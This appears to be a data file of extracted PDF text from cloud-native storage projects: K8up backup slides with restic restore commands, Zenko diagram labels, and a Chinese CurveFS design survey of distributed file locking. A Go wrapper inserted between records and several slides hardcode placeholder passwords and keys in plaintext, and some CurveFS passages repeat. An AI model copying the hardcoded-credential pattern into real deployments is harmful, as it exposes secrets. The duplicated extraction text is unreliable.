c o m / n i x c r a f t / s t a t u s / 6 1 3 6 3 6 5 2 8 4 3 9 3 4 5 1 5 2\n14VSHN – The DevOps Company  1PVC where the restoration takes placeRestore\napiVersion: k8up.io/v1 \nkind: Restore \nmetadata: \n name: restore-wordpress \nspec: \n snapshot: SNAPSHOT_ID \n restoreMethod: \n folder: \n claimName: wordpress-pvc \n backend: \n repoPasswordSecretRef: \n name: backup-repo \n key: password \n s3: \n endpoint: https://sos-ch-gva-2.exo.io \n bucket: my-bucket-change-name \n accessKeyIDSecretRef: \n name: objectbucket-creds \n key: AWS_ACCESS_KEY_ID \n secretAccessKeySecretRef: \n name: objectbucket-creds \n key: AWS_SECRET_ACCESS_KEY1\n15VSHN – The DevOps Company  Manual Restore via restic\n$ export RESTIC_REPOSITORY=s3:http://location/of/the/backup \n$ export RESTIC_PASSWORD=p@assword \n$ export AWS_ACCESS_KEY_ID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX \n$ export AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx \n \n$ restic snapshots \nrepository dec6d66c opened successfully, password is correct \nID Date Host Tags Directory \n---------------------------------------------------------------------- \n5ed64a2d 2018-06-08 09:18:34 macbook-vshn.local /data \n---------------------------------------------------------------------- \n1 snapshots \n \n$ restic restore 5ed64a2d --target /restore\n16VSHN – The DevOps Company  Pre-Backup Pods\napiVersion: k8up.io/v1 \nkind: PreBackupPod \nmetadata: \n name: mysqldump \nspec: \n backupCommand: sh -c 'mysqldump -u$USER -p$PW -h $DB_HOST --all-databases' \n pod: \n spec: \n containers: \n - env: \n - name: USER \n value: dumper \n - name: PW \n value: topsecret \n - name: DB_HOST \n value: mariadb.example.com \n image: mariadb \n command: \n - 'sleep' \n - 'infinity' \n imagePullPolicy: Always \n name: mysqldump\n17VSHN – The DevOps Company  Demo!\n18VSHN – The DevOps Company  Backup of all PVCs in the same namespace as the Schedule object\n\"Application-Aware\" backups\nBackup of data piped through stdin\nRegularly checks for data sanity using restic check\nArchive feature on a dedicated location (for example AWS Glacier)\nDefault backup mechanism on APPUiO CloudOther Features\n19VSHN – The DevOps Company  20VSHN – The DevOps Company  Annotation-Aware Backups\n--- \n# … \ntemplate: \n metadata: \n labels: \n app: mariadb \n annotations: \n appuio.ch/backupcommand: mysqldump -uroot -psecure --all-databases \n# … \n---\n21VSHN – The DevOps Company  Backup of RWO storage\nAlready in 2.6.0-rc2, released today!\nk8up CLI\nBetter visibility of backups\nList available snapshots directly in Kubernetes\nUsability improvements\nSpecify in which container to run backup commandsRoadmap\n22VSHN – The DevOps Company  Your favorite IDE (with a Go plugin)\nDocker\nmake\nKindHow to Contribute?\ngithub.com/vshn/k8up\nGo\n23VSHN – The DevOps Company  Adrian Kosmaczewski, Developer Relations – \nVSHN AG – Neugasse 10 – CH-8005 Zürich – +41 44 545 53 00 – – Thanks!\nadrian@vshn.ch\nvshn.chinfo@vshn.ch\n24" } ]
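The "Manual Restore via restic" slide above lists the environment variables and restic commands needed to restore a K8up backup outside the cluster. The Go sketch below wraps those same steps with os/exec; the repository URL, password, credentials and snapshot ID are the placeholder values from the slide and must be replaced with real ones — this wrapper is not part of K8up itself.

```go
package main

import (
	"log"
	"os"
	"os/exec"
)

// restic runs one restic command with the credentials shown on the
// "Manual Restore via restic" slide; all values below are placeholders.
func restic(args ...string) {
	cmd := exec.Command("restic", args...)
	cmd.Env = append(os.Environ(),
		"RESTIC_REPOSITORY=s3:http://location/of/the/backup",
		"RESTIC_PASSWORD=p@assword",
		"AWS_ACCESS_KEY_ID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
		"AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
	)
	cmd.Stdout, cmd.Stderr = os.Stdout, os.Stderr
	if err := cmd.Run(); err != nil {
		log.Fatalf("restic %v: %v", args, err)
	}
}

func main() {
	restic("snapshots")                                   // list available snapshots
	restic("restore", "5ed64a2d", "--target", "/restore") // snapshot ID taken from the slide
}
```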
{ "category": "Runtime", "file_name": "Zenko_arch_NoNFS.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "GUICloudServer/\nBlobserverAWS\nGCP\nAzureS3C/RINGZenko\nClientBucket & Object \nNamespace\nMongoDBClouds( d a t a a n d\nm e t a d a t a )CLI" } ]
{ "category": "Runtime", "file_name": "CloudServer.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "S3 RoutesCloudServer\nMetadata \nBackendData Backend S3 Client S3S3C\nGCP\nAzure\nRING\nsproxydAWS S3\nmd\nmd\nOpLogleaderMongoDB" } ]
{ "category": "Runtime", "file_name": "Zenko_cluster_NoNFS.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "Server 1 (Master) Zenko \nServicesCluster\nZenko \nServicesZenko \nServices\nServer 2\nServer 3Zenko \nServices\nZenko \nServicesZenko \nServices\nZenko \nServices\nZenko \nServicesZenko \nServicesCLI\nGUIZenko \nInstance\nAzureGCPClientK8S\nK8S\nK8SRING\nAWS\n" } ]
{ "category": "Runtime", "file_name": "CurveFS支持多挂载.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
[ { "data": "CurveFS 支持多挂载 \n• 背景 \n• 本地文件系统的文件并发读写 \no write和read行为 \no 内核数据结构 \no 多进程共享同一个文件 \n▪ O_APPEND \n▪ 文件锁flock/fcntl \n▪ 总结 \n• 多挂载文件系统调研 \no GPFS \n▪ 简介 \n▪ 数据和元数据资源并发保护 \n▪ 数据保护:字节区间锁 \n▪ 元数据保护:共享写锁 \n▪ Allocation Map 保护 \n▪ 其他元数据信息保护 \n▪ 总结 \no Lustre \n▪ 简介 \n▪ Lustre分布式锁管理器模型 \n▪ 基本锁模型 \n▪ 意图锁 \n▪ 范围锁 \n▪ 总结 \no JuiceFS ▪ 简介 \n▪ JuiceFS 使用DBServer 管理锁 \n▪ flock锁 \n▪ fcntl区间锁 \n▪ 总结 \no ChubaoFS \no CephFS \n▪ cephfs使用cap实现分布式锁 \n▪ caps permission \n▪ caps combination \n▪ caps管理 \n▪ 总结: \n▪ fuse write 实例 \n▪ 总结 \no NFS \n▪ 简介 \n▪ 数据和元数据缓存一致性 \n▪ 客户端缓存 \n▪ 结论 \n• 业务场景 \no AI场景 \n• CurveFS 如何支持多挂载 \n背景 \n当前有较多应用场景对于文件系统有一写多读、多写的需求,即同一个文件系统可以在多\n台机器上同时挂载并进行读写。例如: \n▪ 云原生数据库:多台计算节点共同使用一个文件系统,其中主计算节点支持读写,\n从计算节点支持读。 ▪ AI 训练:多台计算节点共享同一个文件系统,基本没有写同一个文件的场景,一\n个节点的写入数据是需要对其他节点立即可见。 \n下图描述的是 curvefs 的多挂载场景, client1 和client2分别在不同的节点上,挂载到\n相同的文件系统 fs1上。 \n \n一写多读场景: client1 写入文件 write(/mnt/mount1/test, 0, 4, \"aaaa\") ,client2\n读取文件 read(/mnt/mount1/test, 0, 4) ,期望可以读到 \"aaaa\"。对于一个文件系统,\n同一时刻只有一个节点在写入。 \n多写多读场景 1:client1 写入文件 write(/mnt/mount1/test, 0, 4, \"aaaa\") ,同时\nclient2写入文件 write(/mnt/mount1/test2, 0, 4, \"bbbb\") ,在两个节点写入完成之\n后,client2读取到read(/mnt/mount1/test, 0, 4) 为\"aaaa\", client1 读取到\nread(/mnt/mount1 /test2, 0, 4) 为\"bbbb\"。对于同一个文件系统,同一 时刻有多个节\n点写入,但写入的是不同文件。 \n多写多读场景 2:client1 写入文件 write(/mnt/mount1/test, 0, 4, \"aaaa\") ,同时\nclient2写入文件 write(/mnt/mount1/test, 4, 4, \"bbbb\") ,在两个节点写入完成之\n后,client1和client2 读取到read(/mnt/mount1/test, 0, 8) 为\"aaaabbbb\" 。对于同\n一个文件系统,同一时刻有多个节点写入同一个文件的不同位置。 \n多读多写场景 3:client1 写入文件 write(/mnt/mount1/test, 0, 4, \"aaaa\") ,同时\nclient2写入文件 write(/mnt/mount1/test, 0, 4, \"bbbb\") , 在两个节点写入完成之\n后,client1和client2 读取到read(/mnt/mount1/test, 0, 4) 要不是\"aaaa\", 要不是\n\"bbbb\"。对于同一个文件系统,同一时刻有多个节点写入同一个文件的相同位置。 \n对于以上四中场景, curvefs 在并发读写场景下需要支持何种一致性?如何支持?是本文\n需要得出的结论 。 \n本地文件系统的文件并发读写 \n在调研多挂载文件系统之前,我们梳理一下本地文件系统对于文件读写的并发操作行为。 \nwrite和read行为 \nposix接口说明: \n1. posix并没有规定并发写行为。 \nThis volume of POSIX.1 ‐2008 does not specify behavior of concurrent \nwrites to a file from multiple processes. Applications should use some \nform of concurrency control. \n2. posix规定read在write返回后可以获取新的数据。无论读写在同一个进程还是\n在不同进程,读写都要保证这样的语义。 \n3. POSIX requires that a read(2) that can be proved to occur after a \nwrite() has returned will return the new data. Note that not all \nfilesystems are POSIX conforming. \nIf a read() of file d ata can be proven (by any means) to occur after a \nwrite() of the data, it must reflect that write(), even if the calls \nare made by different processes. A similar requirement applies to \nmultiple write operations to the same file position. This is needed to \nguarantee the propagation of data from write() calls to subsequent \nread() calls. This requirement is particularly significant for networked \nfile systems, where some caching schemes violate these semantics. \n但是linux提供了一些系统调用,使得用户可以在使用这些接口实现实现期望的并发行\n为。 \n内核数据结构 \nlinux支持多进程间共享打开文件,同一时刻允许多个进程同时打开文件,每个进程之间\n的读写操作互不影响。为了实现这一个机制, linux内核使用了三种数据结构表示打开的\n文件。 \n1、每个进程的进程表中有一个记录项,包含了当前进程所有打开的文件描述符,它包含\n了一个指向文件表项的指针和文件描述符标志。 \n2、内核中,为所有打开的文件维持一张表,它包含了以下内容: \n▪ 当前文件打开状态:以何种方式打开该文件,只读、只写或者可读可写 \n▪ 当前文件的偏移量:当前文件指针所处的位置 \n▪ 指向该文件节点表的指针:节点包含当前文件的属性信息 3、每个文件的信息被封装在 v节点表项中,包含了当前文件名、所有者以及 inode等信\n息。 \n三者之间的关系为: \n 当对文件进行写操作时,在文件表项中的文件偏移量将增加写入的字节数。如果此时文件\n偏移量超过了文件长度,则更新文件长度为当前的文件偏移量 \n多进程共享同一个文件 \n因为每个文件描述符都有一个属于自己的文件表项,所以每个进程之间的文件指针偏移互\n相独立,互相读写不干扰:每 次write完成之后,文件表项的当前文件指针偏移量会立马\n加上写入的字节数。 \n那如何协调多进程之间的数据写入呢? 
linux 提供了以下几种方式: \n O_APPEND \n如果打开文件的时候加了 O_APPEND 参数,每次写入数据前先把偏移量设置到文件末尾 \n文件锁flock/fcntl \nflock \nflock - apply or remove an advisory lock on an open file \n▪ flock 提供的文件锁是建议性质的。即一个进程可以忽略其他进程加的锁,直接对\n目标文件进行读写操作。只有当前进程主动调用 flock去检查,文件锁才会在多进\n程同步中起到作用。 \n▪ 文件锁必须作用在一个打开的文件上。 \nLocks created by flock() are associated with an open file table entry. \nflock() creates locks on systems's \"Open file descriptions\". \"Open file \ndescriptions\" are generated by open() calls. \na filedescriptor (FD) is a reference to a \"Open file description\". F Ds \ngenerated by dup() or fork() refer to the same \"Open file description\". \nflock对已打开的文件加锁时,是加在文件表项上 。考虑这种场景:进程 1打开file1拿\n到fd0,进程2打开file1拿到fd1: \n▪ flock 提供的文件锁是建议性质的。即一个进程可以忽略其他进程加的锁,直接对\n目标文件进行读写操作。只有当前进程主动调用 flock去检查,文件锁才会在多进\n程同步中起到作用。 \n▪ 文件锁必须作用在一个打开的文件上。 \nLocks created by flock() are associated with an open file table entry. \nflock() creates locks on systems's \"Open file descriptions\". \"Open file \ndescriptions\" are generated by open() calls. \na filedescriptor (FD) is a reference to a \"Open file description\". F Ds \ngenerated by dup() or fork() refer to the same \"Open file description\". \nflock对已打开的文件加锁时,是加在文件表项上 。考虑这种场景:进程 1打开file1拿\n到fd0,进程2打开file1拿到fd1: \n如果进程 2对fd1加上了排他锁,实际就是加在了 fd1指向的文件表项上。此时,进程 1\n对fd0加锁会失败。 \n因为操作系统会检测到进程 1中fd0对应的文件表项 和 进程2中fd1对应的文件表项指\n向相同的 v节点,且进程 2中fd2对应的文件表项已经加了排它锁。 \nfcntl \nfnctl locks work as a Process < --> File relationship, ignoring filedescriptors \n \n#include <unistd.h> \n#include <fcntl.h> \n \nint fcntl(int fd, int cmd, ... /* arg */ ); \nfcntl 有多种功能,这里主要介绍文件锁相关的,当 cmd 被设置的 是与文件锁相关的宏\n时,fcntl 就是用于实现文件锁。 \ncmd关于锁的三个命令 : F_GETLK ,F_SETLK,F_SETLKW \nfcntl对已打开文件加锁时,是加在进程上,和文件描述符无关。 fcntl 可以对文件区间\n上锁。所有进程共享操作同一个文件的时候,只有一个 v节点。共享同一个文件相当于共\n享同一个链表。 \n \n• 对于一个文件的任意字节 ,最多只能存在一种类型的锁 (读锁或者写锁 ); \n• 一个给定字节可以有多个读锁 ,但是只能有一个写锁 ; \n• 当一个文件描述符不是打开来用于读时 ,如果我们对它请求一个读锁 ,会出错,同理,\n如果一个描述符不是打开用于写时 ,如果我们对它请求一个写锁 ,也会出错 ; \n• 正如前面所讲的 ,锁不能通过 fork由子进程继承 . \n总结 \n▪ linux 通过文件锁 flock 和 区间锁 fcntl,支持多进程访问时的写写互斥、读写\n互斥、读读共享; \n▪ linux 通过 open 时设置 O_APPEND 标志,以及 pread/pwrite 实现原子写,支持\n多进程追加写的原子性; \nGPFS的DLM,使用一个集中的 global lock manager 运行在集群中的某个 node,与运行\n在每个node的local lock manager 协作,global lock mana ger通过分发 lock token\n在local lock manager 之间协调锁资源, lock token 传递授予分布式锁权利,而不需要\n每次获取或释放所得时候产生一个单独的消息交换,同一个 inode重复访问相同的 disk \nobject,只需要一次消息交互,当另一个 inode需要该锁时,需要额外的消息从第一个\ninode撤回lock token ,以授予第二个 node。local token 也扮演这维护 cache一致性的\n作用。 \nGPFS使用字节区间锁 (byte-range locking) 同步file data 读写。GPFS的区间锁并没有\n简单的实现为:在读写调用期间获取一个字节范围的令牌并在读写完成之后释放,因为这\n种方式锁的开销是不可接受的。 GPFS使用更复杂的字节区间锁协议以减少常见访问模式\n下的令牌竞争。 \n区间令牌的实现如下: \n1. 第一个节点写文件时会获取整个文件范围的区间锁 [0, ∞]。在没有其他节点竞争\n的情况下,所有的读写操作都不需要再和其他节点交互。 \n2. 第二个节点写同样的文件时,发起撤销第一个节点持有的部分区间锁的请求 \n3. 第一个节点接受到请求后,检查当前文件是否还在写入。 \n1. 文件已经关闭,第一个节点会解锁所有区 间,第二个节点会获取整个文件范\n围的区间锁。 因此在没有并发写的共享场景下, GPFS中的字节区间锁就是\n整个文件锁,单个锁就足以访问整个文件 \n2. 文件还在写入,第一个节点会解锁部分字节区间锁。如果当前是顺序写,第\n一个节点从 offset1开始,第二个节点需要从 offset2开始,当 offset1< \noffset2,第一个节点会解锁 [offset2, ∞],当offset1>offset2 ,第一\n个节点会解锁 [0, offset1] 。这种方式允许两个节点写一定的范围。 \n通常多个节点顺序写入同一文件的非重叠部分时,每个节点只需要获取一次字节区\n间锁。 \n4. 
发起区间锁的请求包含两个信息:一个是当前正在处理的 write请求中的参数\noffset和length,另一个是未来可能访问的范围,对于顺序写,这个范围是 [当\n前写入偏移量,∞ ]。当访问模式允许预测被访问文件在特定 node即将访问的区\n域,token协商协议能够通过分割 byte-range token 最小化冲突,不仅仅是简单\n的顺序访问模式,也包括方向顺序、向前或者向后跨越式访问等访问模式。 \n下图对比了多节点读写同一个文件和读写不同文件 的性能。在单文件测试中,文件被分为\nn个连续的区间,每个节点读或写其中一个区间。读、写性能可以线性扩展。在 GPFS中\n多节点写入单个文件的速度和每个节点写入不同文件的速度相同,这说明了区间令牌的有\n效性。 \n这种方式 适用于每个节点在文件的不同且相对较大的区域中写入。 如果每个节点写入很\n多更小的区域,令牌的状态和相应的消息流将会增长。 \n字节区间标记保证 posix语义,IO的最小区间是一个山区,字节区间令牌的粒度不能小\n于一个扇区。 GPFS也使用字节区间令牌来同步数据分配, 因此即使单个写入操作不重叠\n(\"虚假共享 \"),多个节点写入同一数据块也会导致令牌冲突。为了优化不需要 posix语义\n的应用程序的细粒度共享, GPFS允许禁用字节区间锁。 \n元数据保护:共享写锁 \n和其他文件系统一样, GPFS使用inode存储文件属性和数据块。 \n▪ inode的更新。多个节点写入同一个文件会导致并发更新文件的 inode(修改文件大\n小、时间、分配空间 )。如果inode独占写锁来同步,那会导致每次写操作都有锁\n冲突。 \nGPFS在inode上使用共享写锁 (shared write lock ),允许多个 node的并发写入,\n仅需要精确的文件大小或 mtime的操作会冲突 (如:stat系统调用 )。某个访问该文\n件的node会被指定为 metanode ,只有metanode 可以读写 inode。其他node仅更新\n本地缓存的 inode拷贝,定期或者当 shared write tok en被另一个 node上的\nstat()或read()操作撤回时,将其更新传给 metanode ,metanode 通过保留最大 size\n和最新的 mtime合并来自多个 node的inode更新。非单调更新文件大小或 mtime的\n操作,如 (trunc() 或者utimes()) 需要独占 exclusive inode lock 锁。 \n▪ 数据块的更新。使用类似方式的同步。 \nGPFS使用分布式锁保证 posix语义(例如stat()系统调用 ),inode及间接快使用集\n中方式。这允许多个 node写入同一个文件,更新 metanode 没有锁冲突,每次写操作\n不需从metanode 获取信息。指定文件的 metanode 是借助token server 动态选举\n的,当一个 node第一次访问文件,它尝试获取该文件的 metanode token ,其他node\n学习,当 metanode 不再访问该文件,并且相关修改已移出 cache,该node会放弃它\n的metanode token ,并停止相应行为,当它随后收到一个来自其他 node的metadata\n请求,它会发送一个拒绝的答复,其他 node会尝试通过获取 metanode token 接管\nmetanode角色。 \nAllocation Map 保护 \nalloction map 用来记录文件系统中 disk block 的分配状态。每一个 disk block 可以划\n分为32个subblock 存储小文件,用 32位的allocation map 标记。用于查找指定大小空\n闲disk block 或者subblock 的链表。 \n分配磁盘空间需要更新 allocation map ,这个资源也是要在个节点之间同步的。 \n将map分成若干个固定数量的可独立锁定的 region,不同的 node可以从不同的 region\n分配空间,仅一个 node负责维护所有 region的空闲空间统计信息。 \n该allocation manager node 在mount阶段读取 allocation map 初始化空闲空间统计信\n息,其他 node定期汇报分配回收情况。每当 node正在使用的 region空间耗尽时,它会\n向allocation map 请求一个 region,而不是所有的 node单独查找包含空闲空间的\nregion。 \n一个文件可能包含不同 region的空间,删除一个文件需要更新 allocation map ,其他\nnode正在使用的 region会发送到相应的 node执行,allocation manager 会定期发布哪\n些node正在使用哪些 region,促进构造发送释放请求。 \n其他元数据信息保护 除了上述资源外, GPFS还包含的全局 metadata 有:文件系统配置信息,空间分配\nquota,访问控制权限,以及扩展属性。 GPFS使用中心管理节点来协调或者收集来自不同\n节点的元数据更新。例如: quota \nmanager 向写入文件的各节点分发较大的磁盘空间,配额检查在本地完成,仅偶尔与\nquota manager 交互。 \n总结 \nGPFS 用户手册:\nhttps://www.ira.inaf.it/centrocal/tecnica/GPFS/GPFS_31_Admin_Guide.pdf \nGPFS 提供用户态文件接口: \n \nGPFS 对 posix 部分接口的支持: \nposix 是否支持 \nopen with O_APPEND 支持 \n \nflock/fcntl 支持多节点的 flock \n支持maxFcntlRangePerFile 个数的fcntl() \nLustre \n简介 \nLustre文件系统是一个具有高性能、高可扩和高可靠性的基于对象的分布式文件系统。\n它通过Lustre锁管理器 (Lustre Distributed Lock Manager ,LDLM)技术为整个系统的共\n享资源提供同步访问和一致性视图。 \nLustre提供了Posix兼容的UNIX文件系统接口。 Lustre采用了基于对象存储的技术,元\n数据和存储数据分离的存储结构,带宽和存储容量可以随存储服务器增加而动态扩展。 \nLustre 由三个部件组成: \n▪ 元数据服务器( Metadata Server, MDS )维持整个系统全局一致性命名空间,负责\n处理lookup、create、unlink、stat等与文件元数据有关的命名空间操作的交以\n及与元数据相关的锁服务。 \n▪ 对象存储服务器( Object Storage Server, OSS )负责与文件数据相关的锁服务及\n实际的文件 I/O,并将I/O数据保存到后端基于对象存储的设备中。 \n▪ 客户端( Client File System, CFS ) \nLustre文件系统中,每个节点都有 DLM模块,为并发文件访问提供了各种锁服务。基于\nDLM, Lustre 使用一种范围锁来维护细粒度的文件数据并发访问的一致性。 \n在访问文件数据前,客户端首先要从 OSS获得对文件数据访问的范围锁,获得对文件访问\n授权;结合范围锁, Lustre还实现了客户端数据的写回缓冲功能。 \n在打开文件时,客户端先和 MDS交互,同时获得文件数据对象布局属性;在进行文件读写\n时,根据已获得的数据对象布局属性,在 DLM范围锁的保护下可以直接并行地与多个 OSS\n进行并行数据 I/O交互。 \nLustre分布式锁管理器模型 \nLustre在很大程度上借鉴了传统的分布式锁管理器的设计理念,其基本模型在 Lustre文\n件系统中 被称为普通锁 (Plain Lock) 。再此基础上, Lustre对普通锁模型进行了扩张,\n引入了两种新类型锁:意图锁 (Intent Lock) 和范围锁 (Extent Lock) 。 \n基本锁模型 \nLustre DLM 模型使用锁命名空间 (Lock Namespace) 
来组织和管理共享资源以及资源上的\n锁。当要获得某个资源的锁时,先要将该资源在锁命名空间中命名。任何资源都属于一个\n锁资源命名空间,而且都有一个相应的父资源。每个锁资源都有一个资源名,该资源名对\n其父节点是唯一的。所有的锁资源组成一个锁资源树型结构。当要获得某个 资源的锁时,\n系统必须首先从该资源的所有祖先获得锁。 Lustre支持六种锁模式,如下: \n模\n式 名称 访问授\n权 含义 \nEX 执行 RW 允许资源的读写访问,且其他任何进程不能获得读写权限 \nPW 保护\n写 W 允许资源的写访问,且其他任何进程不能获得写权限 \nPR 保护\n读 R 允许资源的读访问,且其他任何进程不能获得写权限但可共享\n读 \nCW 并发\n写 W 对其他进程没有限制,可以对资源并发写访问,无保护方式写 \nCR 并发\n读 R 对其他进程没有限制,可以对资源并发读访问,无保护方式读 \nNL 空 无 仅仅表示对该资源有兴趣,对资源没有访问权限 \n每种锁都有一定的兼容性,如果一个锁可以与已经被授权的锁共享访问资源,则称为锁模\n式兼容。下图是锁兼容性转换表, \"1\"表示锁模式可以并存。执行锁严格性最高,兼容性\n最差;空锁严格性最低,兼容性最好。 \n \n在Lustre锁管理器中,锁命名空间中每个资源都维持三个锁队列: \n1. 授权锁队列:该队列包含所有已被锁管理器授权的锁。但正在转换为与已授权锁模\n式不兼容的锁除外,该队列的锁的持有者可以对资源进行访问。 \n2. 转换锁队列:该队列锁已经授权,但试图转换的锁模式与当前授权队列中的锁模式\n不兼容,正在等待其他锁的释放或降低访问权限。锁管理器按照 FIFO的顺序处理\n转化队列中的锁。 \n3. 等待锁队列:该队列包含所有正在等待授权的新锁请求。该队列中锁模式与已授权\n的锁模式不兼容。锁管理器按 FIFO的顺序处理等待队列中的锁。 \n新锁请求只有在三个队列为空或者请求的锁模式与该资源所有的锁模式兼容时才会被授\n权,否则就会被加入等待锁队列中。如下图所示: \n \n对于资源 res1 \n▪ CR锁L1和CW锁L2是相互兼容的锁,都已经获得了访问授权; \n▪ 新请求PW锁L3因为与锁 L1和锁L2模式不兼容,所以被加入到等待队列中。 \n对于资源 res2 \n▪ CR锁L1、CR锁L2和CW锁L3都获得访问授权; \n▪ 假设某个时刻持有锁 L2的客户请求将锁转换为 EX模式,因与授权的 L1、L3不兼\n容,所以转换请求必须等待 L1、L3的释放才能获得锁而被加入到转换队列中。 \n意图锁 \nLustre中,意图锁主要用于文件元数据的访问,它通过执行锁的意图来减少元数据访问\n所需要的消息传递次数,从而减少每次操作的延迟。 \n当客户端向 MDS发起元数据操作请求时,在请求中指明操作意图,在交付给锁管理器处理\n之前,先由 MDS执行意图锁的意图,然后返回不同锁资源。 \n例如,在客户端请求创建一个新文件时: \n▪ 首先将该请求标志为文件创建的意图 (IT_CREATE) \n▪ 然后必须请求从 MDS获得它的父目录的锁来执行 lookup操作 \n▪ 如果锁请求被授权,那么 MDS就用请求指定的意图来修改目录,创建请求的\n文件,成功之后并不返回父目录锁,而是返回创建文件的锁给客户端 \n \n范围锁 \n范围锁用于维护细粒度的文件数据并发访问。其实现过程与 GPFS文件系统采用的范围锁\n类似。与普通锁不同的是,范围锁增加了一个表示获得授权的锁定文件范围的域。由于同\n一资源的不同锁的锁定范围之间是有关联的,所以范围锁的语义也发生了一些变化。 \nLustre结合范围锁和本地锁管理器实现了文件数据的写回缓冲策略。下图展示了使用范\n围锁的示例: \n \n1. 客户端A要对某文件的存储对象 obj的[a, b]进行读写时,先从 OST上的锁服务器\n获得的存储对象。 obj对应锁资源的范围锁 L<PW,[a,b]>,并将该锁资源的副本\n加入到本地锁管理器中 \n2. 客户端A利用本地文件系统 VFS层的缓存机制进行读写操作 \n3. 客户端A执行完操作后并不立即将锁释放给锁服务器,而是采用一种 lazy的思\n想,只有当其他的客户端 B要获得的范围锁与该锁有冲突并且锁服务器通过阻塞回\n调函数通知 A客户端时,才将脏的缓存数据批处理地刷新到 OST,并将锁 释放返还\n给锁服务器,然后再将锁资源授权给客户端 B \n总结 \nLustre 对 posix 部分接口的支持: \nposix 是否支持 \nopen with \nO_APPEND 支持。有如下问题: \n1. 每个客户端都需要对所有 OST进行EOF锁定,有很大的锁开销 \n2. 第二个客户端在第一个客户端完成之前不能获取所有锁,客户\n端只能顺序写入 \n3. 为了避免死锁,它们以已知的一致性顺序获取锁 \nflock/fcntl 支持多节点的 flock/fcntl ,使用\"-o flock\" 的方式挂载,可以获取\n全局一致性;使用 \"-o localflock\" 可以保证本地节点上的一致性。 \n关于lustre, Lustre wiki 上有几个值得参考的问题: \n1. Lustre 数据缓存和缓存一致性的方法是什么? \n为元数据 (names, readdir, lists, inode attribute) 和 文件数据提供了完整的\n缓存一致性。客户端和服务器都使用分布式锁管理服务获取锁;在释放锁之前刷新\n缓存。 \n2. Lustre 是否符合 posix? 有例外吗? \n严格来说, posix并没有说明文件系统将如何在多个 客户端上运行。 Lustre 合理\n解释了单节点 posix要求对应到集群环境中意味着什么。 \n比如:通过 Lustre分布式锁管理器强制执行读写操作的一致性;如果在多个节点\n上运行的应用程序同时读取和写入文件的同一部分,它们将看到一致的结果。有两\n个例外: \n1. atime的更新。在高性能集群文件系统中保持完全一致的 atime更新是不实\n际的。Lustre延迟更新文件的时间:需要更新 inode时搭载更新 atime; 文\n件关闭时更新 atime。客户端读取或者写入数据时,只刷新本地缓存中的时\n间更新。 \n2. flock和lockf 通过分布式锁管理器实现全局一致性。 \n3. 为什么不使用 IBM的DLM? \nLustre DLM 设计大量借鉴了 VAX Clusters DLM 。尽管我们因不使用现有包 (例如: \nIBM的DLM)而受到一些合理的批评,但迄今为止表名我们做出了正确的选择:它更\n小、更简单,并且至少对于我们的需求而言,更具可扩展性。 \nLustre DLM 大约有6000行代码,已被证明是一项可监督的维护任务,尽管其复杂\n性令人生畏。相比之下 IBM DLM 几乎是所有 Lustre总和的大小。然而,这不一定\n是对 IBM DLM 的批评。值得称赞的是, 它是一个完整的 DLM,它实现了我们在 \nLustre 中不需要的许多功能。 \nLustre的DLM并不是真正的分布式,至少在与其他此类系统相比时不是。 Lustre \nDLM 中的锁始终由管理特定 MDT或OST的服务节点管理,并且不会像其他系统允许\n的那样更改主服务器。省略这种类似的功能使我们能够快速开发和稳定文件系统所\n需的核心 DML功能,并添加扩展(扩展锁、意图锁、策略函数等)。 JuiceFS \n简介 \nJuiceFS是高性能 posix文件系统,数据本身被持久化在对象存储,元数据根据场景需求\n被持久化在 Redis、MySQL、SQLite等多种数据库引擎中。 \nJuiceFS由三部分组成: \n1. JuiceFS 客户端:协调对象存储和元数据存储引擎,以及 POSIX、Hadoop、\nKubernetes 、S3 Gateway 等文件系统接口的实现; \n2. 数据存储:存储数据本身,支持本地磁盘、对象存储; \n3. 
元数据引擎:存储数据对应的元数据,支持 Redis、MySQL、SQLite 等多种引擎; JuiceFS 使用DBServer 管理锁 \nflock锁 \nflock锁提供三种类型: F_RDLCK,F_WRLCK,F_UNLCK \nDBServer 中对于每个锁的记录如下:一条记录由 inode、sid、owner、ltype组成。其中\nsid是sessionid ,全局递增, mount的时候去 DBServer 申请。 \n因此flock可以对应 fuse进程打开的 inode,可以作用到不同的节点。 JuiceFS 用flock\n来同时保护数据和元数据资源。 \nJuiceFS 使用DBServer 管理锁 \nflock锁 \nflock锁提供三种类型: F_RDLCK,F_WRLCK,F_UNLCK \nDBServer 中对于每个锁的记录如下:一条记录由 inode、sid、owner、ltype组成。其中\nsid是sessionid ,全局递增, mount的时候去 DBServer 申请。 \n因此flock可以对应 fuse进程打开的 inode,可以作用到不同的节点。 JuiceFS 用flock\n来同时保护数据和元数据资源。 \ntype flock struct { \n Inode Ino `xorm:\"notnull unique(flock)\"` \n Sid uint64 `xorm:\"notnull unique(flock)\"` \n Owner int64 `xorm:\"notnull unique(flock)\"` \n Ltype byte `xorm:\"notnull\"` \n} \n▪ 用户请求 flock锁时,客户端从 DBServer 中获取关 于该inode的所有锁请求,并\n判断请求锁是否与已有锁冲突 \n▪ 如果没有冲突,将改锁插入数据库,加锁成功;如果有冲突,并且申请锁是阻塞类\n型,则等待指定时间后重试;如果有冲突,并且申请锁是非阻塞类型,则加锁失\n败。 \nfcntl区间锁 \n区间锁用 plock表示。DBServer 中对于每个锁的记录如下:一条记录由 inode、sid、\nowner、records 组成。 \n其中records的数据结构是 plockRecord ,每个Record由ltype、pid、start、end组\n成。 \n因此plock可以记录 fuse进程打开的 inode上各区间的上锁情况。 \ntype plock struct { \n Inode Ino `xorm:\"notnull unique(plock)\"` \n Sid uint64 `xorm:\"notnull unique(plock)\"` \n Owner int64 `xorm:\"notnull unique(plock)\"` \n Records []byte `xorm:\"blob notnull\"` \n} \ntype plockRecord struct { \n ltype uint32 pid uint32 \n start uint64 \n end uint64 \n} \n1. 用户请求 plock锁的流程处理和 flock一样,但是在检测锁冲突的时候,要和所有\n客户端持有的区间锁一一比较。 \n2. 更新锁列表有所不同, 